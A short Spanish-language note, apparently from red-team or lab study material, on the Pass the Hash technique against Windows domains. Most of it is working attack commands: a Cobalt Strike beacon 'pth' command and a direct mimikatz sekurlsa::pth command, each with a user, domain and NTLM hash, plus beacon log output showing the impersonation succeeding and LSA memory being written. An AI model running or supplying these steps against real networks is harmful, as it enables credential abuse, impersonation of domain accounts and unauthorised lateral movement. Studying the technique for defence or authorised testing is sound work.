Pass the Hash (PtH)

Es un ataque que permite autenticarnos a sistemas windows usando el NTLM hash del password de un usuario en vez del password en texto plano.

pth PAY\sqlsvc 32918fbec63cc3c7c83a8c3c9787842c

Esto pasa el token sobre un named pipe al beacon y lo impersona automaticamente.

[02/27 06:14:07] [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:"sqlsvc" /domain:"PAY" /ntlm:32918fbec63cc3c7c83a8c3c9787842c /run:"%COMSPEC% /c echo 16ed02714a8 > \\.\pipe\30cbe3" command
[02/27 06:14:09] [+] host called home, sent: 313695 bytes
[02/27 06:14:10] [+] Impersonated PAY\sqlsvc
[02/27 06:14:10] [+] received output:
user	: sqlsvc
domain	: PAY
program	: C:\Windows\system32\cmd.exe /c echo 16ed02714a8 > \\.\pipe\30cbe3
impers.	: no
NTLM	: 32918fbec63cc3c7c83a8c3c9787842c
  |  PID  6016
  |  TID  4620
  |  LSA Process is now R/W
  |  LUID 0 ; 6692080 (00000000:00661cf0)
  \_ msv1_0   - data copy @ 0000022876045F90 : OK !
  \_ kerberos - data copy @ 000002287CEFF168
   \_ des_cbc_md4       -> null             
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 000002287E3DE178 (32) -> null

Tambien se puede realizar con mimikatz directamente.

mimikatz sekurlsa::pth /user:"sqlsvc" /domain:"PAY" /ntlm:32918fbec63cc3c7c83a8c3c9787842c